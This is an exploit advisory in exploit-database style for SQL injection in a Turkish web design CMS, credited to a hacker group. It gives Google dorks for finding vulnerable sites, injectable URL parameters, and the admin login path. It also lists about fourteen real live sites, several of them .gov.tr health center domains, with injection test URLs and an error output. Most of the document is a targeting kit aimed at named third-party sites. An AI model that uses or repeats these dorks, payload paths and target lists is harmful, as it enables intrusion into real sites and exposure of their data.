#################################################################################################
# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks :
inurl:''/index.php?sayfa=DuyuruOku''
intext:''Asmwebsitesi.net Asm Web Sitesi''
intext:''BirWebMaster Web Tasarım Hizmetleri''
# Exploits :
/index.php?sayfa=DuyuruOku&id=[SQL Inj]
/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]
/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]
# Admin Login Panel Path : /admin/index.php
#################################################################################################
# Example Vulnerable SQL Sites =>
bestelsizasm.com/index.php?sayfa=DuyuruOku&id=2%27
tekkirazasm.com/index.php?sayfa=DuyuruOku&id=2%27
sabanozuasm.com/index.php?sayfa=DuyuruOku&id=2%27
sahinciliasm.com/index.php?sayfa=DuyuruOku&id=3%27
musguzeltepeasm.com/index.php?sayfa=DuyuruOku&id=11%27
kitreliasm.com/index.php?sayfa=DuyuruOku&id=12%27
cumhuriyetasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
emirefendiasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
mervesehirasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
idil1noluasm.com/index.php?sayfa=DuyuruOku&id=7%27
ercis5noluasm.com/index.php?sayfa=DuyuruOku&id=1%27
hasancikasm.com/index.php?sayfa=DuyuruOku&id=2%27
islamdagasm.com/index.php?sayfa=DuyuruOku&id=13%27
tokiavrupaasm.com/index.php?sayfa=DuyuruOku&id=2%27
[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu
# SQL Database Error =>
Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################